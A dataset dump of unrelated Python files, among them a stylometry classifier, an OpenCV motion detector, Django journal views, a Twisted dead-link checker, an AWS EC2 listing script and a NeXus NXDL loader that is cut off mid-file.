syntacticView(view):\n\t__slots__=['ns','supportLowerBound','n','k','remine_trees_until','minedTreesCacheFile','treeFeature']\n\tdef __init__(self, ns, supportLowerBound, n, k, remine_trees_until=0, minedTreesCacheFile = None):\n#if minedTreesCacheFile exists, read the trees from minedTreesCacheFile. Otherwise:\n#if remine_trees_until == 0, remine trees everytime. Otherwise, remine `remine_trees_until` times.\n#After each mining, the result gets saved to `minedTreesCacheFile`.\n\t\tself.ns = ns\n\t\tself.supportLowerBound = supportLowerBound\n\t\tself.n = n\n\t\tself.k = k\n\t\tself.remine_trees_until = None if remine_trees_until == 0 else remine_trees_until\n\t\tself.minedTreesCacheFile = minedTreesCacheFile\n\t\tself.treeFeature = None\n\tdef getFeature(self,docbase):\n\t\tfeatures=[]\n\t\tfor n in self.ns:\n\t\t\tfunction = self.getFunction(posNGramCounterDocumentFunction,n)\n\t\t\tlimit = config.featurelimit_max_pos_ngrams[n-1]\n\t\t\tif limit is None:\n\t\t\t\tvalues = set()\n\t\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\t\tvalues = values.union(set(vals))\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(values)))\n\t\t\telse:\n\t\t\t\tvalues = Counter()\n\t\t\t\tfor doc in docbase.documents:\n\t\t\t\t\tvalues += function.getValue(doc)\n\t\t\t\tselection = heapq.nlargest(limit,values,lambda ngram: values[ngram])\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(selection)))\n\t\tbase = docbase.stDocumentbase\n\t\tif self.treeFeature is None and self.minedTreesCacheFile is not None and os.path.exists(self.minedTreesCacheFile):\n\t\t\twith open(self.minedTreesCacheFile,'rb') as f:\n\t\t\t\tself.treeFeature = pickle.load(f)\n\t\t\t\tself.remine_trees_until = 0\n\t\tif self.remine_trees_until is 0:\n\t\t\ttreeFeature = self.treeFeature\n\t\telse:\n\t\t\ttreeFeature = (syntaxTreeFrequencyFeature, \\\n\t\t\t\ttuple(base.mineDiscriminativePatterns(len(pos.pos_tags), self.supportLowerBound, self.n, self.k,\\\n\t\t\t\t\t\t\t\t\t\t\t\tnum_processes=config.num_threads_mining)))\n\t\t\tif self.remine_trees_until is not None:\n\t\t\t\tself.remine_trees_until -= 1\n\t\t\t\tif self.remine_trees_until == 0:\n\t\t\t\t\tself.treeFeature = treeFeature\n\t\t\tif self.minedTreesCacheFile is not None:\n\t\t\t\twith open(self.minedTreesCacheFile,'wb') as f:\n\t\t\t\t\tpickle.dump(treeFeature,f)\n\t\tfeatures.append(treeFeature)\n\t\t#return combinedFeature(features,self.functionCollection if hasattr(self,'functionCollection') else None)\n\t\treturn self.getFunction(combinedFeature,*features)\n\t\t#return treeFeature\n\tdef setTreeFeature(self,feature):\n\t\tself.treeFeature = self.functionCollection.getFeatureIdentifier(feature)\n\t\tself.remine_trees_until=0\n\tdef readTreeFeatureFromClassifier(self,classifier):\n\t\tself.setTreeFeature(classifier.feature)\nclass kimView(view):\n\t__slots__= ['supportLowerBound', 'n', 'k']\n\tdef __init__(self,supportLowerBound=0, n=10, k=2):\n\t\tself.supportLowerBound = supportLowerBound\n\t\tself.n=n\n\t\tself.k=k\n\tdef getFeature(self,docbase):\n\t\treturn self.getFunction(syntaxTreeFrequencyFeature, tuple(docbase.stDocumentbase.mineDiscriminativePatterns(len(pos.pos_tags), \\\n\t\t\tself.supportLowerBound, self.n, self.k, num_processes=config.num_threads_mining)))\nclass posView(view):\n\t__slots__=['ns']\n\tdef __init__(self, ns):\n\t\tself.ns = ns\n\tdef getFeature(self,docbase):\n\t\tfeatures=[]\n\t\tfor n in self.ns:\n\t\t\tfunction = self.getFunction(posNGramCounterDocumentFunction,n)\n\t\t\tlimit = config.featurelimit_max_pos_ngrams[n-1]\n\t\t\tif limit is None:\n\t\t\t\tvalues = set()\n\t\t\t\tfor vals in function.getValuev(docbase.documents):\n\t\t\t\t\tvalues = values.union(set(vals))\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(values)))\n\t\t\telse:\n\t\t\t\tvalues = Counter()\n\t\t\t\tfor doc in docbase.documents:\n\t\t\t\t\tvalues += function.getValue(doc)\n\t\t\t\tselection = heapq.nlargest(limit,values,lambda ngram: values[ngram])\n\t\t\t\tfeatures.append((posNGramFeature,n,tuple(selection)))\n\t\treturn self.getFunction(combinedFeature,*features)\nclass mlModel:\n\t# a model is a mapping from an abstract feature space F and a set of labels L to the unit interval [0,1].\n\t# they are created from by a machine learning algorithm. This class should be inherited from\n\t__slots__=[]\n\tdef getProbabilities(self,vectors):\n\t\traise NotImplementedError\n\t\t#vectors is a list of elements of F.\n\t\t#should return a dict or counter of the form {l1: p1, ..., ln:pn} where L={l1,...,ln} are the different labels\n\t\t#and p1,...,pn in [0,1]. A higher value for pi means that label li is more likely.\n\tdef getPrediction(self,vectors):\n\t\t# gets a list of elements of V and returns a list of same lengths of elements in L.\n\t\t# returns an element with maximal probability\n\t\treturn [countermax(p) for p in self.getProbabilities(vectors)]\n\tdef free(self):\n\t\tpass # may be inherited to be reliably called when not needed any more.\n\t# derived classes should further make sure they are picklable (i.e. implement __getstate__ and __setstate__)\nclass learningMachine:\n\t# a learning maching takes a list of tuples (v,l) where v is an element of an abstract feature space F and\n\t# l is a label. It returns an instance of mlModel with the same label set and feature space.\n\t# instances of this class should be hashable.\n\t__slots__=[]\n\tdef getModel(self,labels,vectors):\n\t\tpass\nclass argumentPassingLearningMachine(learningMachine):\n\t#takes a class derived from mlModel. For each call of getModel, it passes the arguments to the __init__-function of the given class.\n\t__slots__=['modelClass']\n\tdef __init__(self,modelClass):\n\t\tself.modelClass = modelClass\n\tdef getModel(self,labels,vectors):\n\t\treturn self.modelClass(labels,vectors)\nclass easyparallelArgumentPassingLearningMachine(learningMachine):\n\t#takes a class derived from mlModel. For each call of getModel, it passes the arguments to the __init__-function of the given class.\n\t#the init-function MAY be called in another process (using multiprocessing), so it should not modify any global state.\n\t__slots__=['modelClass']\n\tdef __init__(self,modelClass):\n\t\tself.modelClass = modelClass\n\tdef getModel(self,labels,vectors):\n\t\treturn easyparallel.callWorkerFunction(self.modelClass,labels,vectors)\nclass documentClassifier(documentFunction):\n\t__slots__=['feature','model']\n\tdef __init__(self,trainingDocbase,feature,ml):\n\t\tdocbase = trainingDocbase\n\t\tself.feature = feature\n\t\tauthors = [doc.author for doc in trainingDocbase.documents]\n\t\tvectors = feature.getValuev(trainingDocbase.documents)\n\t\tprint(\"start classifying with %d vectors and %d features\" % (len(vectors),feature.vectorLength()))\n\t\t#self.regression = easyparallel.callWorkerFunction(regression.multiclassLogit,authors,vectors)\n\t\tfor vec in vectors:\n\t\t\tfor i,x in enumerate(vec):\n\t\t\t\tif math.isnan(x):\n\t\t\t\t\tvec[i]=0\n\t\tself.model = ml.getModel(authors,vectors)\n\t\tprint(\"returned from classifying with %d vectors and %d features\" % (len(vectors),feature.vectorLength()))\n\t\tif hasattr(feature,'functionCollection'):\n\t\t\tself.functionCollection = feature.functionCollection\n\t\tsuper().__init__()\n\tdef mappingv(self,documents):\n\t\t#return self.regression.predict(self.feature.getValuev(documents))\n\t\tprint(\"start predicting with %d features and %d documents\" % (self.feature.vectorLength(),len(documents)))\n\t\tvectors = self.feature.getValuev(documents)\n\t\tprint(\"got %d features for %d documents\" % (self.feature.vectorLength(),len(documents)))\n\t\t#result = easyparallel.callWorkerFunction(self.regression.getProbabilities,vectors)\n\t\tresult = self.model.getProbabilities(vectors)\n\t\tprint(\"got probabilities %d features and %d documents\" % (self.feature.vectorLength(),len(documents)))\n\t\treturn result\n\t\t'''\n\tdef getProbabilities(self,documents):\n\t\treturn self.regression.getProbabilities(self.feature.getValuev(documents))\n\t\t'''\n\tdef predict(self,documents):\n\t\tprobs = self.getValuev(documents)\n\t\treturn [countermax(p) for p in probs]\n\tdef dumps(self):\n\t\treturn pickle.dumps( (self.functionCollection.getFeatureIdentifier(self.feature), self.model))\n\tdef loads(self,state,functionCollection):\n\t\tself.functionCollection = functionCollection\n\t\tstate = pickle.loads(state)\n\t\tself.feature = functionCollection.getFunction(*state[0])\n\t\tself.model = state[1]\n\t\tsuper().__init__()\n\tdef free(self):\n\t\tself.clearCache()\n\t\tself.model.free()\n\t\tself.feature.removeFromFunctionCollection()\ndef loadClassifier(state,functionCollection):\n\tresult = documentClassifier.__new__(documentClassifier)\n\tresult.loads(state,functionCollection)\n\treturn result\nif __name__== '__main__':\n\timport regression\n\tcoll = documentFunctionCollection()\n\tbase = documentbase([document('This is your father','papa'), document('This is your mother.', 'mama')])\n\tbase.functionCollection = coll\n\tview1 = characterView([1,2,3])\n\tview1.functionCollection = coll\n\tfeature1 = view1.getFeature(base)\n\tprint(\"feature 1:\")\n\tprint(feature1.getValuev(base.documents))\n\tprint(\"use this learning maching: \",regression.multiclassLogit)\n\tclassifier1 = documentClassifier(base, feature1, regression.multiclassLogit)\n\tprint(classifier1.getValuev(base.documents))\n\tview2 = lexicalView()\n\tview2.functionCollection = coll\n\tfeature2 = view2.getFeature(base)\n\tprint(\"feature 2:\")\n\tprint(feature2.getValuev(base.documents))\n\tclassifier2 = documentClassifier(base, feature2, regression.multiclassLogit)\n\tprint(classifier2.getValuev(base.documents))\n\tview3 = syntacticView([1,2,3],0,10,2)\n\tview3.functionCollection = coll\n\tfeature3 = view3.getFeature(base)\n\tprint(\"feature 3:\")\n\tprint(feature3.getValuev(base.documents))\n\tclassifier3 = documentClassifier(base, feature3, regression.multiclassLogit)\n\tprint(classifier3.getValuev(base.documents))\n\tdumped = classifier3.dumps()\n\tprint(\"clasifier 3 got dumped to \"+repr(dumped))\n\tprint(loadClassifier(dumped,coll).getValuev(base.documents))\n","sub_path":"features.py","file_name":"features.py","file_ext":"py","file_size_in_byte":29603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"50523532","text":"\nimport cv2\n\ncap = cv2.VideoCapture(\"Roads - 1952.mp4\")\n\n# Object detection from stable camera\nobject_detector = cv2.createBackgroundSubtractorMOG2()\n\n\nwhile True:\n ret, frame = cap.read()\n height, width,_ = frame.shape\n\n # print(height,width)\n\n # Extract the field of intrest\n roi = frame[150:,295:]\n print(roi)\n\n # Object dection\n mask = object_detector.apply(frame)\n countor, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for cnt in countor:\n # Calculate the area and eleminate small areas\n area = cv2.contourArea(cnt)\n if area > 100:\n cv2.drawContours(frame,[cnt],-1,(0,255,0))\n \n\n cv2.imshow(\"Roi\",roi)\n cv2.imshow(\"Frame\",frame)\n # cv2.imshow(\"Mask\",mask)\n\n\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"546961099","text":"def ask_ok(prompt, retries=3, reminder='Please try again!!'):\n while True:\n ok=input(prompt)\n if ok in('y','yes'):\n return True\n if ok in('n','no'):\n return False\n retries=retries-1\n if retries < 0:\n raise ValueError('invalid user response')\n print(reminder)\n input(\"Press Enter to continue...\") \ndef fib2(n):\n result=[]\n a,b=0,1\n while a 0:\n return item\n\n\n\n\nprint(finder([1,2,3,4,5,6,7], [3,7,2,1,4,6]))\n\n\n# solution with sort\n\ndef finder_two(arr_one: list, arr_two:list):\n for num_one, num_two in zip(arr_one, arr_two):\n if num_one != num_two:\n return num_one\n return arr_one[-1]","sub_path":"python/array/missing-element.py","file_name":"missing-element.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477160118","text":"import time\nimport json\n\n\ndef accept_rate(data):\n N = len(data)\n accept = 0\n for line in data:\n if \"None\" not in line.values():\n accept += 1\n return accept / N\n\n\ndef longest_dur(data):\n max_ = 0\n for line in data:\n if \"None\" not in line.values():\n apply = time.mktime(time.strptime(line[\"applied\"], '%m-%d-%Y %H:%M'))\n offer = time.mktime(time.strptime(line[\"offer\"], '%m-%d-%Y %H:%M'))\n max_ = max(max_, (offer - apply) / 3600)\n return max_\n\n\ndef most_fail_stage(data):\n # index 1:onsite, 2:phone, 3:apply\n stages = [0,0,0,0]\n for line in data:\n res = tuple(line.values())\n if \"None\" in res:\n i = res.count(\"None\")\n stages[i] += 1\n i = stages.index(max(stages))\n if i == 3:\n stage = \"applied\"\n elif i == 2:\n stage = \"phone\"\n else:\n stage = 'onsite'\n return stage, stages[i]\n","sub_path":"django-job-stat/JobMatch/stages/stage_stat.py","file_name":"stage_stat.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"89326173","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 17 18:22:11 2018\n\n@author: George\n\"\"\"\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nfileName = r'C:\\Users\\George\\Desktop\\trial_2.txt'\n\nXc = np.loadtxt(fileName,skiprows=1,usecols=(3,))\nYc = np.loadtxt(fileName,skiprows=1,usecols=(4,))\nchannelList = np.loadtxt(fileName,skiprows=1,usecols=(0,), dtype=str)\n\ncolourMap = []\n\nAl561 = []\nAl647 = []\n\nfor i in range(len(channelList)):\n if channelList[i] == 'Alexa561':\n colourMap.append('red')\n Al561.append([Xc[i],Yc[i]])\n \n if channelList[i] == 'Alexa647':\n colourMap.append('blue')\n Al647.append([Xc[i],Yc[i]])\n\n#plt.scatter(Xc,Yc,c=colourMap)\nx,y = zip(*Al561)\n#plt.scatter (x,y)\n\n#### cluster Al561\nfrom sklearn.cluster import DBSCAN\n#clustering is dependent on epsilon value (eps)\ndbscan = DBSCAN(eps=30).fit(Al561)\n#get all clustering labels - labels indicate the cluster the points has been assigned to\nlabels = dbscan.labels_\n#work out unique labels for colours\nunique_labels = set(labels)\nprint ('Number of clusters assigned = ' + str(len(unique_labels)))\n#assign colours to labels\ncolours = [plt.cm.Spectral(each)\n for each in np.linspace(0, 1, len(unique_labels))]\n#create dictionary of labels and colours\ncolourIndex = dict(zip(unique_labels, colours))\n#create list of colours, indexed the same as x,y position, for plotting\nclusterColourMap = []\nfor label in labels:\n clusterColourMap.append(colourIndex[label])\n\n#plot x,y coordinates with cluster colours\nplt.scatter (x, y, c=clusterColourMap)\n","sub_path":"scatterPlot_superRes.py","file_name":"scatterPlot_superRes.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"281588785","text":"import os\nimport signal\nimport logging\nimport argparse\n\nfrom twisted.internet import defer, task\n\nfrom deadurl_tester import init_logging\nfrom deadurl_tester.actions import test_url_action, extract_links_action\n\n\nclass DeadLinksIdentifier(object):\n def __init__(self, jobs, url):\n self.log = logging.getLogger(self.__class__.__name__)\n self.jobs = jobs\n self.url = url\n self.extract_links_action = extract_links_action.URLParser()\n self.test_url_action = test_url_action.URLTester()\n self.dead_url_list = []\n\n # this is a some kind of queue obj with X numbers of workers\n @defer.inlineCallbacks\n def find_dead_links(self, url_list, jobs):\n coop = task.Cooperator()\n wait_task_deferreds = []\n for job_number in range(jobs):\n self.log.info('scheduling #%s task', job_number)\n gen = self.find_dead_url_generator(url_list)\n wait_task_deferreds.append(coop.coiterate(gen))\n self.log.info('waiting %s tasks to complete...', len(wait_task_deferreds))\n yield defer.DeferredList(wait_task_deferreds)\n self.log.info('completed %s tasks : dead links finder', len(wait_task_deferreds))\n\n def find_dead_url_generator(self, url_list):\n while url_list:\n one_url = url_list.pop()\n formatted_url = self.format_link(one_url)\n yield self.test_one_url(formatted_url)\n\n @defer.inlineCallbacks\n def test_one_url(self, one_url):\n # GET requests will not be started in parallel unless threads.deferToThread is used\n # Or Twisted spawnProcess\n # this part can be speed up - it is a single thread now\n response_code = yield self.test_url_action(one_url)\n if not response_code:\n # this is unhandled error\n self.dead_url_list.append(one_url)\n if str(response_code).startswith('4'):\n # this is 4xx Client errors\n self.dead_url_list.append(one_url)\n if str(response_code).startswith('5'):\n # this is 5xx Server error\n self.dead_url_list.append(one_url)\n\n def format_link(self, href):\n # follow local links\n if href.startswith('/'):\n href = self.url + href\n elif not href.startswith('http'):\n href = self.url + '/' + href\n return href\n\n @defer.inlineCallbacks\n def run(self):\n self.log.info('extracting all link from: %s', self.url)\n links_obj = yield self.extract_links_action(self.url)\n links = links_obj.links\n self.log.info('found links to test: %s -> %s', len(links), links)\n yield self.find_dead_links(links, self.jobs)\n if self.dead_url_list:\n self.log.info('Found %s dead links: %s', len(self.dead_url_list), self.dead_url_list)\n else:\n self.log.debug('No dead links found')\n\n\n@defer.inlineCallbacks\ndef main(reactor, args):\n \"\"\" Entry point.\"\"\"\n app = DeadLinksIdentifier(args.jobs, args.url)\n yield app.run()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-v', '--verbose', action='append_const', const=1)\n parser.add_argument('-l', '--logdir', default='./', required=False)\n parser.add_argument('-j', '--jobs', default=4, type=int, required=False)\n parser.add_argument('-u', '--url', required=True)\n args = parser.parse_args()\n init_logging(args)\n try:\n task.react(main, [args])\n finally:\n os.killpg(0, signal.SIGKILL)\n","sub_path":"python/deadurl_tester/deadurl_tester/app/app_deadurl_scaner.py","file_name":"app_deadurl_scaner.py","file_ext":"py","file_size_in_byte":3512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"521936318","text":"from django.shortcuts import render, get_object_or_404\nfrom django.urls import reverse_lazy\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .models import Entry\nfrom django.db.models import Q\n\n\nclass EntriesList(LoginRequiredMixin,ListView):\n model = Entry\n template_name = 'entries/home.html'\n context_object_name = 'entries'\n paginate_by = 5\n\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Home'\n return context\n \n def get_queryset(self): # Overwrite method\n return Entry.objects.filter(author = self.request.user).order_by('-date_posted')\n\nclass EntriesDetail(LoginRequiredMixin, DetailView):\n model = Entry\n template_name = 'entries/entry_detail.html'\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Home'\n return context\n \n\nclass CreateEntry(LoginRequiredMixin, CreateView):\n model = Entry\n fields = ['title', 'content']\n \n\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n \n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Create Entry'\n return context\n\nclass DeleteEntry(LoginRequiredMixin, DeleteView):\n model = Entry\n success_url = reverse_lazy('home')\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Delete Entry'\n return context\n\nclass UpdateEntry(LoginRequiredMixin, UpdateView):\n model = Entry\n fields = ['title', 'content']\n\n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Edit Entry'\n return context\n\nclass SearchEntry(LoginRequiredMixin, ListView):\n model = Entry\n template_name = 'entries/search_results.html'\n context_object_name = 'entries'\n paginate_by = 5\n\n def get_queryset(self):\n user = self.request.user\n query = self.request.GET.get('search_entries')\n if user:\n object_list = Entry.objects.filter(\n Q(title__icontains=query) | (Q(content__icontains=query))).filter(author=user)\n return object_list\n \n def get_context_data(self, **kwargs): # Overwrite method\n context = super().get_context_data(**kwargs)\n context ['title'] = 'Search Entries'\n return context","sub_path":"entries/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547621084","text":"### TESTING AREA ###\n\nimport xml.etree.cElementTree as ET\n\n\nosm_file = 'example.xml'\n\ndef get_element(osm_file, tags=('node', 'way', 'relation')):\n \"\"\"Yield element if it is the right type of tag\"\"\"\n\n context = ET.iterparse(osm_file, events=('start', 'end'))\n _, root = next(context)\n for event, elem in context:\n if event == 'end' and elem.tag in tags:\n yield elem\n root.clear()\n \ntree = ET.parse('example.xml')\nroot = tree.getroot()\nprint(tree.getroot())\nprint(root.tag)\nprint(root.attrib)\n\nfor element in root:\n print(element.tag, element.attrib)","sub_path":"get_element_test.py","file_name":"get_element_test.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"375834921","text":"class Coordinate(object):\n def __init__ (self, x, y):\n self.x = x\n self.y = y\n def distance (self, other):\n x_diff_sq = (self.x - other.x)**2\n y_diff_sq = (self.y - other.y)**2\n return (x_diff_sq + y_diff_sq)**0.5\n def __str__(self):\n return \"<\"+str(self.x)+\",\"+str(self.y)+\">\"\n \n def __sub__(self, other):\n return Coordinate(self.x-other.x, self.y - other.y)\n \n\nc =Coordinate(3,4)\norigin = Coordinate(0,0)\nprint(c)\nprint(origin)\nprint(type(origin))\nprint(type(c))\n\nprint(c.x)\n\nprint(origin.x)\nprint(c.distance(origin))\n\nprint(Coordinate.distance(c,origin))\nprint(c-origin)","sub_path":"OOP_prac.py","file_name":"OOP_prac.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"321225355","text":"import argparse\nimport os\nfrom shutil import copyfile\n\n\nfrom energypy.common import ensure_dir\n\n\ndef make_config_parser():\n \"\"\"\n Parses arguments from the command line for running config experiments\n\n returns\n args (argparse NameSpace)\n \"\"\"\n parser = argparse.ArgumentParser(\n description='energypy config expt argparser'\n )\n\n # required\n parser.add_argument('expt_name', default=None, type=str)\n parser.add_argument('run_name', default=None, type=str)\n\n args = parser.parse_args()\n\n return args\n\n\ndef make_paths(\n experiments_dir,\n expt_name,\n run_name,\n load_configs=True\n):\n \"\"\"\n Creates a dictionary of paths for use with experiments\n\n args\n experiments_dir (str) usually energypy/energypy/experiments\n expt_name (str)\n run_name (str)\n\n returns\n paths (dict) {name: path}\n\n Folder structure\n experiments/configs/expt_name/expt.ini\n runs.ini\n\n experiments/results/expt_name/run_name/tensorboard/run_name/rl\n /act\n /learn\n env_histories/ep_1/info.csv\n ep_2/info.csv\n e..\n expt.ini\n runs.ini\n agent_args.txt\n env_args.txt\n info.log\n debug.log\n \"\"\"\n # rename the join function to make code below eaiser to read\n join = os.path.join\n\n results_dir = join(experiments_dir, 'results', expt_name)\n\n if load_configs:\n config_dir = join(experiments_dir, 'configs', expt_name)\n\n config_paths = {\n 'expt_config': join(config_dir, 'expt.ini'),\n 'run_configs': join(config_dir, 'runs.ini')\n }\n\n ensure_dir(join(results_dir, run_name))\n\n # copy config files into results directory\n copyfile(\n config_paths['expt_config'], join(results_dir, 'expt.ini')\n )\n\n copyfile(\n config_paths['run_configs'], join(results_dir, 'runs.ini')\n )\n else:\n config_paths = {}\n\n results_paths = {\n\n # tensorboard runs are all in the tensoboard folder\n # this is for easy comparision of runs\n 'tb_rl': join(results_dir, 'tensorboard', run_name, 'rl'),\n 'tb_act': join(results_dir, 'tensorboard', run_name, 'act'),\n 'tb_learn': join(results_dir, 'tensorboard', run_name, 'learn'),\n\n # run specific\n 'env_histories': join(results_dir, run_name, 'env_histories'),\n 'debug_log': join(results_dir, run_name, 'debug.log'),\n 'info_log': join(results_dir, run_name, 'info.log'),\n 'env_args': join(results_dir, run_name, 'env_args.txt'),\n 'agent_args': join(results_dir, run_name, 'agent_args.txt'),\n 'ep_rewards': join(results_dir, run_name, 'episode_rewards.csv'),\n 'memory': join(results_dir, '{}_memory.pkl'.format(run_name))\n }\n\n paths = {**config_paths, **results_paths}\n\n # check that all our paths exist\n for key, path in paths.items():\n ensure_dir(path)\n\n\n return paths\n","sub_path":"energypy/experiments/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"188549819","text":"import boto3\nimport os\n\n#by env varibles get credential\nACCESS_KEY=os.environ['ACCESS_KEY']\nSECRET_KEY=os.environ['SECRET_KEY']\n\nsession = boto3.Session(\n aws_access_key_id=ACCESS_KEY,\n aws_secret_access_key=SECRET_KEY\n #aws_session_token=SESSION_TOKEN\n)\n\nec2client = session.client('ec2')\n#by credential file ~/.aws/\n#ec2client = boto3.client('ec2')\nresponse = ec2client.describe_instances()\nfor reservation in response[\"Reservations\"]:\n print(str(len(reservation[\"Instances\"])) + \" is ec2 instances number\")\n for instance in reservation[\"Instances\"]:\n # This sample print will output entire Dictionary object\n #print(instance)\n # This will print will output the value of the Dictionary key 'InstanceId'\n print(instance[\"InstanceId\"])\n print(instance['LaunchTime']) \n","sub_path":"get-ec2.py","file_name":"get-ec2.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"300470001","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n#-----------------------------------------------------------------------------\n# :author: Pete R. Jemian\n# :email: prjemian@gmail.com\n# :copyright: (c) 2017, Pete R. Jemian\n#\n# Distributed under the terms of the Creative Commons Attribution 4.0 International Public License.\n#\n# The full license is in the file LICENSE.txt, distributed with this software.\n#-----------------------------------------------------------------------------\n\n\n'''\nLoad and/or document the structure of a NeXus NXDL class specification\n'''\n\nfrom __future__ import print_function\n\nimport collections\nimport copy\nimport lxml.etree\nimport os\nimport sys\n\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nimport punx\nimport punx.singletons\nimport punx.nxdl_schema\n\n\nclass NXDL_Manager(object):\n '''\n the NXDL classes found in ``nxdl_dir``\n '''\n\n nxdl_file_set = None\n \n def __init__(self, file_set):\n import punx.cache_manager\n assert(isinstance(file_set, punx.cache_manager.NXDL_File_Set))\n if file_set.path is None or not os.path.exists(file_set.path):\n raise punx.FileNotFound('NXDL directory: ' + str(file_set.path))\n \n self.nxdl_file_set = file_set\n self.classes = collections.OrderedDict()\n# get_element = file_set.nxdl_element_factory.get_element\n \n for nxdl_file_name in get_NXDL_file_list(file_set.path):\n definition = NXDL_element__definition(file_set.path) # the default\n obj = copy.deepcopy(definition) # ALWAYS make a copy of that\n # TODO: adjust minOccurs defaults for application definition or contributed definition\n obj.set_file(nxdl_file_name)\n obj.parse()\n self.classes[obj.title] = obj\n\n\ndef get_NXDL_file_list(nxdl_dir):\n '''\n return a list of all NXDL files in the ``nxdl_dir``\n '''\n if not os.path.exists(nxdl_dir):\n raise punx.FileNotFound('NXDL directory: ' + nxdl_dir)\n NXDL_categories = 'base_classes applications contributed_definitions'.split()\n nxdl_file_list = []\n for category in NXDL_categories:\n path = os.path.join(nxdl_dir, category)\n if not os.path.exists(path):\n raise IOError('no definition available, cannot find ' + path)\n for fname in sorted(os.listdir(path)):\n if fname.endswith('.nxdl.xml'):\n nxdl_file_list.append(os.path.join(path, fname))\n return nxdl_file_list\n\n\ndef validate_xml_tree(xml_tree):\n '''\n validate an NXDL XML file against the NeXus NXDL XML Schema file\n\n :param str xml_file_name: name of XML file\n '''\n import punx.schema_manager\n schema = punx.schema_manager.get_default_schema_manager().lxml_schema\n try:\n result = schema.assertValid(xml_tree)\n except lxml.etree.DocumentInvalid as exc:\n raise punx.InvalidNxdlFile(str(exc))\n return result\n\n\n# class NXDL_Base(object):\n# '''\n# a complete description of a specific NXDL definition\n# '''\n# \n# parent = None\n# \n# def __init__(self, parent):\n# self.parent = parent\n# \n# def set_defaults(self, rules):\n# '''\n# use the NXDL Schema to set defaults\n# \n# do not call this from the constructor due to infinite loop\n# '''\n# pass\n# \n# \n# class NXDL_element__definition(NXDL_Base):\n# '''\n# a complete description of a specific NXDL definition\n# '''\n# \n# title = None\n# category = None\n# file_name = None\n# nxdl = None\n# lxml_tree = None\n# nxdl_file_set = None\n# \n# nxdl_attributes = {}\n# nxdl_groups = {}\n# nxdl_fields = {}\n# nxdl_symbols = {}\n# \n# __parsed__ = False\n# \n# def __init__(self, file_set):\n# self.nxdl_file_set = file_set\n# NXDL_Base.__init__(self, None)\n# \n# def __getattribute__(self, *args, **kwargs):\n# '''\n# implement lazy load of definition content\n# '''\n# if len(args) == 1 and args[0] == 'lxml_tree' and not self.__parsed__:\n# self.parse() # only parse this file once content is requested\n# return object.__getattribute__(self, *args, **kwargs)\n# \n# def set_defaults(self, rules):\n# '''\n# use the NXDL Schema to set defaults\n# \n# :param obj rules: instance of Schema_Attribute\n# \n# do not call this from the constructor due to infinite loop\n# '''\n# get_element = self.nxdl_file_set.nxdl_element_factory.get_element # alias\n# \n# for k, v in rules.attrs.items():\n# self.nxdl_attributes[k] = get_element('attribute', parent=self)\n# \n# _breakpoint = True # TODO:\n# \n# def set_file(self, fname):\n# self.file_name = fname\n# self.title = os.path.split(fname)[-1].split('.')[0]\n# self.category = os.path.split(os.path.dirname(fname))[-1]\n# \n# def parse(self):\n# '''\n# parse the XML content\n# \n# This step is deferred until self.lxml_tree is requested\n# since only a small subset of the NXDL files are typically\n# referenced in a single data file.\n# '''\n# if self.__parsed__:\n# return # only parse this file when content is requested\n# \n# if self.file_name is None or not os.path.exists(self.file_name):\n# raise punx.FileNotFound('NXDL file: ' + str(self.file_name))\n# \n# self.lxml_tree = lxml.etree.parse(self.file_name)\n# self.__parsed__ = True # NOW, the file has been parsed\n# \n# try:\n# validate_xml_tree(self.lxml_tree)\n# except punx.InvalidNxdlFile as exc:\n# 